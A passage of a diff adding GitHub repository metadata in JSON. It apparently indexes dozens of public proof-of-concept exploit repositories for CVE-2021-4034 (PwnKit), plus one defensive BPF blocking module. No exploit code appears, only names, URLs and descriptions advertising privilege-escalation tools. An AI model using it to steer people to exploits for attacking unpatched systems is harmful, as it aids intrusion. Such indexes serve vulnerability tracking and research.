"https:\/\/github.com\/zcrosman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zcrosman\/cve-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-26T17:07:26Z", + "updated_at": "2022-01-26T17:08:27Z", + "pushed_at": "2022-01-26T17:13:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452380197, + "name": "CVE-2021-4034", + "full_name": "robemmerson\/CVE-2021-4034", + "owner": { + "login": "robemmerson", + "id": 5360258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5360258?v=4", + "html_url": "https:\/\/github.com\/robemmerson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/robemmerson\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-26T17:49:58Z", + "updated_at": "2022-01-26T17:50:58Z", + "pushed_at": "2022-01-26T23:44:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452381294, + "name": "CVE-2021-4034", + "full_name": "joeammond\/CVE-2021-4034", + "owner": { + "login": "joeammond", + "id": 12400203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12400203?v=4", + "html_url": "https:\/\/github.com\/joeammond", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joeammond\/CVE-2021-4034", + "description": "Python exploit code for CVE-2021-4034 (pwnkit)", + "fork": false, + "created_at": "2022-01-26T17:53:16Z", + "updated_at": "2024-11-26T08:49:02Z", + "pushed_at": "2022-01-28T00:29:15Z", + "stargazers_count": 156, + "watchers_count": 156, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 38, + "watchers": 156, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452384014, + "name": "PwnKit-Exploit", + "full_name": "luijait\/PwnKit-Exploit", + "owner": { + "login": "luijait", + "id": 60628803, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60628803?v=4", + "html_url": "https:\/\/github.com\/luijait", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/luijait\/PwnKit-Exploit", + "description": "Proof of Concept (PoC) CVE-2021-4034 ", + "fork": false, + "created_at": "2022-01-26T18:01:26Z", + "updated_at": "2024-11-07T15:18:51Z", + "pushed_at": "2022-02-07T15:42:00Z", + "stargazers_count": 95, + "watchers_count": 95, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "base64", + "c", + "cve", + "cve-2021-4034", + "exploit", + "hacking", + "linux", + "offensive-security", + "offsec", + "pentesting", + "poc", + "polkit", + "proof-of-concept", + "pwnkit", + "security" + ], + "visibility": "public", + "forks": 15, + "watchers": 95, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 452400857, + "name": "CVE-2021-4034", + "full_name": "Anonymous-Family\/CVE-2021-4034", + "owner": { + "login": "Anonymous-Family", + "id": 98486038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98486038?v=4", + "html_url": "https:\/\/github.com\/Anonymous-Family", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Anonymous-Family\/CVE-2021-4034", + "description": "Linux system service bug gives root on all major distros, exploit published A vulnerability in the pkexec component of Polkit identified as CVE-2021-4034 PwnKit is present in the default configuration of all major Linux distributions and can be exploited to gain privileges over the compj researchers.", + "fork": false, + "created_at": "2022-01-26T18:53:47Z", + "updated_at": "2022-01-26T23:40:24Z", + "pushed_at": "2022-01-26T19:31:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 452404386, + "name": "CVE-2021-4034", + "full_name": "phvilasboas\/CVE-2021-4034", + "owner": { + "login": "phvilasboas", + "id": 40247368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40247368?v=4", + "html_url": "https:\/\/github.com\/phvilasboas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phvilasboas\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-26T19:04:55Z", + "updated_at": "2022-01-26T19:10:05Z", + "pushed_at": "2022-01-26T19:10:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452414357, + "name": "CVE-2021-4034", + "full_name": "hackingyseguridad\/CVE-2021-4034", + "owner": { + "login": "hackingyseguridad", + "id": 20928501, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20928501?v=4", + "html_url": "https:\/\/github.com\/hackingyseguridad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackingyseguridad\/CVE-2021-4034", + "description": "CVE-2021-4034, exploit para escalado de privilegios en SO Linux a root", + "fork": false, + "created_at": "2022-01-26T19:36:38Z", + "updated_at": "2022-11-17T23:01:21Z", + "pushed_at": "2022-01-27T19:04:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "elevar", + "exploit", + "linux", + "privilegios", + "root", + "vuln" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452417265, + "name": "CVE-2021-4034", + "full_name": "vilasboasph\/CVE-2021-4034", + "owner": { + "login": "vilasboasph", + "id": 98488838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98488838?v=4", + "html_url": "https:\/\/github.com\/vilasboasph", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vilasboasph\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-26T19:46:19Z", + "updated_at": "2022-01-28T15:56:36Z", + "pushed_at": "2022-01-26T19:46:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452430809, + "name": "CVE-2021-4034", + "full_name": "nobelh\/CVE-2021-4034", + "owner": { + "login": "nobelh", + "id": 42378484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42378484?v=4", + "html_url": "https:\/\/github.com\/nobelh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nobelh\/CVE-2021-4034", + "description": "Polkit pkexec CVE-2021-4034 Proof Of Concept and Patching", + "fork": false, + "created_at": "2022-01-26T20:32:10Z", + "updated_at": "2022-02-08T20:59:44Z", + "pushed_at": "2022-03-03T21:20:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452436770, + "name": "pkexec-lpe-poc", + "full_name": "callrbx\/pkexec-lpe-poc", + "owner": { + "login": "callrbx", + "id": 9372418, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9372418?v=4", + "html_url": "https:\/\/github.com\/callrbx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/callrbx\/pkexec-lpe-poc", + "description": "POC for CVE-2021-4034", + "fork": false, + "created_at": "2022-01-26T20:52:32Z", + "updated_at": "2023-02-22T18:17:44Z", + "pushed_at": "2022-01-28T16:58:49Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452496340, + "name": "CVE-2021-4034", + "full_name": "cd80-ctf\/CVE-2021-4034", + "owner": { + "login": "cd80-ctf", + "id": 86139991, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86139991?v=4", + "html_url": "https:\/\/github.com\/cd80-ctf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cd80-ctf\/CVE-2021-4034", + "description": "A simple proof-of-concept for CVE-2021-4034 (pkexec local privilege escalation)", + "fork": false, + "created_at": "2022-01-27T01:14:11Z", + "updated_at": "2022-07-29T11:05:21Z", + "pushed_at": "2022-01-27T01:23:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452512326, + "name": "CVE-2021-4034", + "full_name": "Al1ex\/CVE-2021-4034", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-4034", + "description": "Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)", + "fork": false, + "created_at": "2022-01-27T02:27:15Z", + "updated_at": "2024-07-04T11:36:35Z", + "pushed_at": "2022-01-27T02:27:41Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-4034", + "pkexec" + ], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452585484, + "name": "CVE-2021-4034", + "full_name": "ashutoshrohilla\/CVE-2021-4034", + "owner": { + "login": "ashutoshrohilla", + "id": 37948751, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37948751?v=4", + "html_url": "https:\/\/github.com\/ashutoshrohilla", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ashutoshrohilla\/CVE-2021-4034", + "description": "This repository contains the exploit for vulnerability CVE-2021-4034 .", + "fork": false, + "created_at": "2022-01-27T07:39:51Z", + "updated_at": "2022-04-24T16:54:23Z", + "pushed_at": "2022-01-27T07:46:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452595993, + "name": "CVE-2021-4034", + "full_name": "nikip72\/CVE-2021-4034", + "owner": { + "login": "nikip72", + "id": 49496243, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49496243?v=4", + "html_url": "https:\/\/github.com\/nikip72", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nikip72\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-27T08:14:55Z", + "updated_at": "2022-01-27T08:19:51Z", + "pushed_at": "2022-01-27T08:21:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452600117, + "name": "CVE-2021-4034", + "full_name": "NiS3x\/CVE-2021-4034", + "owner": { + "login": "NiS3x", + "id": 93822668, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93822668?v=4", + "html_url": "https:\/\/github.com\/NiS3x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NiS3x\/CVE-2021-4034", + "description": "PoC CVE 2021-4034 PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec", + "fork": false, + "created_at": "2022-01-27T08:28:56Z", + "updated_at": "2024-08-12T20:20:06Z", + "pushed_at": "2022-01-27T08:40:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452620702, + "name": "CVE-2021-4034", + "full_name": "thatstraw\/CVE-2021-4034", + "owner": { + "login": "thatstraw", + "id": 61482810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61482810?v=4", + "html_url": "https:\/\/github.com\/thatstraw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thatstraw\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-27T09:35:54Z", + "updated_at": "2022-03-01T17:04:44Z", + "pushed_at": "2022-01-27T10:27:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452622549, + "name": "CVE-2021-4034", + "full_name": "luckythandel\/CVE-2021-4034", + "owner": { + "login": "luckythandel", + "id": 27768247, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27768247?v=4", + "html_url": "https:\/\/github.com\/luckythandel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/luckythandel\/CVE-2021-4034", + "description": "This is a POC for the vulnerability found in polkit's pkexec binary which is used to run programs as another users.", + "fork": false, + "created_at": "2022-01-27T09:42:18Z", + "updated_at": "2022-01-27T09:51:38Z", + "pushed_at": "2022-01-27T09:49:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-4034", + "local-privilege-escalation", + "pkexec", + "polkit", + "polkit-agent", + "polkit-exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452629706, + "name": "CVE-2021-4034", + "full_name": "Plethore\/CVE-2021-4034", + "owner": { + "login": "Plethore", + "id": 6282217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6282217?v=4", + "html_url": "https:\/\/github.com\/Plethore", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Plethore\/CVE-2021-4034", + "description": "Python exploit for CVE-2021-4034", + "fork": false, + "created_at": "2022-01-27T10:05:09Z", + "updated_at": "2022-01-27T10:22:23Z", + "pushed_at": "2022-01-27T10:27:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452636288, + "name": "lsm_bpf_check_argc0", + "full_name": "evdenis\/lsm_bpf_check_argc0", + "owner": { + "login": "evdenis", + "id": 150761, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150761?v=4", + "html_url": "https:\/\/github.com\/evdenis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/evdenis\/lsm_bpf_check_argc0", + "description": "LSM BPF module to block pwnkit (CVE-2021-4034) like exploits", + "fork": false, + "created_at": "2022-01-27T10:26:46Z", + "updated_at": "2024-11-22T15:25:10Z", + "pushed_at": "2022-02-17T16:46:44Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bpf", + "cve-2021-4034", + "lsm", + "pwnkit" + ], + "visibility": "public", + "forks": 0, + "watchers": 21, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 452715280, + "name": "poppy", + "full_name": "tahaafarooq\/poppy", + "owner": { + "login": "tahaafarooq", + "id": 49201347, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49201347?v=4", + "html_url": "https:\/\/github.com\/tahaafarooq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tahaafarooq\/poppy", + "description": "CVE-2021-4034 PoC , polkit < 0.131", + "fork": false, + "created_at": "2022-01-27T14:29:55Z", + "updated_at": "2024-08-12T20:20:06Z", + "pushed_at": "2022-12-20T09:03:26Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-4034", + "exploit-development", + "proof-of-concept", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452719291, + "name": "pkwned", + "full_name": "DosAmp\/pkwned", + "owner": { + "login": "DosAmp", + "id": 592891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/592891?v=4", + "html_url": "https:\/\/github.com\/DosAmp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DosAmp\/pkwned", + "description": "Proof of Concept for CVE-2021-4034 (with experimental traceless exploitation)", + "fork": false, + "created_at": "2022-01-27T14:40:50Z", + "updated_at": "2022-01-29T14:55:49Z", + "pushed_at": "2022-01-29T14:48:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-4034", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452720408, + "name": "CVE-2021-4034", + "full_name": "PwnFunction\/CVE-2021-4034", + "owner": { + "login": "PwnFunction", + "id": 19750782, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19750782?v=4", + "html_url": "https:\/\/github.com\/PwnFunction", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PwnFunction\/CVE-2021-4034", + "description": "Proof of concept for pwnkit vulnerability", + "fork": false, + "created_at": "2022-01-27T14:43:57Z", + "updated_at": "2024-11-22T15:12:42Z", + "pushed_at": "2023-01-12T19:23:29Z", + "stargazers_count": 337, + "watchers_count": 337, + "has_discussions": false, + "forks_count": 43, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 43, + "watchers": 337, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 452738641, + "name": "CVE-2021-4034", + "full_name": "NULL0B\/CVE-2021-4034", + "owner": { + "login": "NULL0B", + "id": 26231330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26231330?v=4", + "html_url": "https:\/\/github.com\/NULL0B", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NULL0B\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-27T15:33:17Z", + "updated_at": "2022-01-27T05:23:59Z", + "pushed_at": "2022-01-27T02:12:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 452753346, + "name": "CVE-2021-4034", + "full_name": "locksec\/CVE-2021-4034", + "owner": { + "login": "locksec", + "id": 6196087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6196087?v=4", + "html_url": "https:\/\/github.com\/locksec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/locksec\/CVE-2021-4034", + "description": "Exploit PoC for the polkit pkexec (PWNKIT) vulnerability", + "fork": false, + "created_at": "2022-01-27T16:15:21Z", + "updated_at": "2023-03-05T08:49:53Z", + "pushed_at": "2022-01-27T16:53:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452758223, + "name": "CVE-2021-4034-Rust", + "full_name": "deoxykev\/CVE-2021-4034-Rust", + "owner": { + "login": "deoxykev", + "id": 37129444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37129444?v=4", + "html_url": "https:\/\/github.com\/deoxykev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/deoxykev\/CVE-2021-4034-Rust", + "description": "Linux LPE using polkit-1 written in Rust. ", + "fork": false, + "created_at": "2022-01-27T16:28:56Z", + "updated_at": "2023-05-02T10:50:59Z", + "pushed_at": "2022-02-03T05:17:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452783558, + "name": "CVE-2021-4034", + "full_name": "c3c\/CVE-2021-4034", + "owner": { + "login": "c3c", + "id": 2326945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2326945?v=4", + "html_url": "https:\/\/github.com\/c3c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c3c\/CVE-2021-4034", + "description": "Pre-compiled builds for CVE-2021-4034", + "fork": false, + "created_at": "2022-01-27T17:43:24Z", + "updated_at": "2024-09-23T03:15:32Z", + "pushed_at": "2022-03-30T15:38:20Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452784469, + "name": "Pwnkit-exploit", + "full_name": "Fato07\/Pwnkit-exploit", + "owner": { + "login": "Fato07", + "id": 40800448, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40800448?v=4", + "html_url": "https:\/\/github.com\/Fato07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fato07\/Pwnkit-exploit", + "description": "Exploit for pkexec (CVE-2021-4034) ", + "fork": false, + "created_at": "2022-01-27T17:46:07Z", + "updated_at": "2022-01-27T18:10:33Z", + "pushed_at": "2022-01-27T18:32:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452919328, + "name": "CVE-2021-4034-NoGCC", + "full_name": "EstamelGG\/CVE-2021-4034-NoGCC", + "owner": { + "login": "EstamelGG", + "id": 46676047, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46676047?v=4", + "html_url": "https:\/\/github.com\/EstamelGG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EstamelGG\/CVE-2021-4034-NoGCC", + "description": "CVE-2021-4034简单优化,以应对没有安装gcc和make的目标环境", + "fork": false, + "created_at": "2022-01-28T02:54:38Z", + "updated_at": "2024-10-28T04:01:21Z", + "pushed_at": "2022-02-09T09:58:59Z", + "stargazers_count": 77, + "watchers_count": 77, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 77, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 452924557, + "name": "CVE-2021-4034", + "full_name": "pengalaman-1t\/CVE-2021-4034", + "owner": { + "login": "pengalaman-1t", + "id": 97300090, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97300090?v=4", + "html_url": "https:\/\/github.com\/pengalaman-1t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pengalaman-1t\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-28T03:19:57Z", + "updated_at": "2022-01-28T03:20:20Z", + "pushed_at": "2022-01-28T03:20:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452932780, + "name": "CVE-2021-4034-BASH-One-File-Exploit", + "full_name": "NeonWhiteRabbit\/CVE-2021-4034-BASH-One-File-Exploit", + "owner": { + "login": "NeonWhiteRabbit", + "id": 97998625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97998625?v=4", + "html_url": "https:\/\/github.com\/NeonWhiteRabbit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NeonWhiteRabbit\/CVE-2021-4034-BASH-One-File-Exploit", + "description": "CVE-2021-4034 - One line in the terminal for an instant priv esc to boxes that are vulnerable. See usage.", + "fork": false, + "created_at": "2022-01-28T03:58:34Z", + "updated_at": "2022-02-15T14:37:50Z", + "pushed_at": "2022-01-28T21:07:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452937646, + "name": "pwnkit-go", + "full_name": "jpmcb\/pwnkit-go", + "owner": { + "login": "jpmcb", + "id": 23109390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23109390?v=4", + "html_url": "https:\/\/github.com\/jpmcb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jpmcb\/pwnkit-go", + "description": "Exploit for the PwnKit vulnerability, CVE-2021-4034, written in Go", + "fork": false, + "created_at": "2022-01-28T04:24:20Z", + "updated_at": "2024-01-13T14:32:48Z", + "pushed_at": "2022-01-28T16:23:20Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cybersecurity", + "infosec", + "security" + ], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452975219, + "name": "CVE-2021-4034", + "full_name": "JoyGhoshs\/CVE-2021-4034", + "owner": { + "login": "JoyGhoshs", + "id": 36255129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36255129?v=4", + "html_url": "https:\/\/github.com\/JoyGhoshs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JoyGhoshs\/CVE-2021-4034", + "description": "Exploit for Local Privilege Escalation Vulnerability in polkit’s pkexec ", + "fork": false, + "created_at": "2022-01-28T07:21:40Z", + "updated_at": "2023-12-11T05:33:58Z", + "pushed_at": "2022-01-28T08:12:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 453053476, + "name": "PwnKit-CVE-2021-4034", + "full_name": "galoget\/PwnKit-CVE-2021-4034", + "owner": { + "login": "galoget", + "id": 8353133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8353133?v=4", + "html_url": "https:\/\/github.com\/galoget", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/galoget\/PwnKit-CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-28T12:08:25Z", + "updated_at": "2022-10-27T19:48:41Z", + "pushed_at": "2022-10-27T19:48:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 453070166, + "name": "POC-CVE-2021-4034", + "full_name": "Yakumwamba\/POC-CVE-2021-4034", + "owner": { + "login": "Yakumwamba", + "id": 72974932, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72974932?v=4", + "html_url": "https:\/\/github.com\/Yakumwamba", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yakumwamba\/POC-CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-28T13:04:22Z", + "updated_at": "2022-09-28T07:54:01Z", + "pushed_at": "2022-01-28T16:10:39Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 453070905, + "name": "CVE-2021-4034-Pwnkit", + "full_name": "ayoub-elbouzi\/CVE-2021-4034-Pwnkit", + "owner": { + "login": "ayoub-elbouzi", + "id": 96302619, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96302619?v=4", + "html_url": "https:\/\/github.com\/ayoub-elbouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ayoub-elbouzi\/CVE-2021-4034-Pwnkit", + "description": "PoC for PwnKit: Local 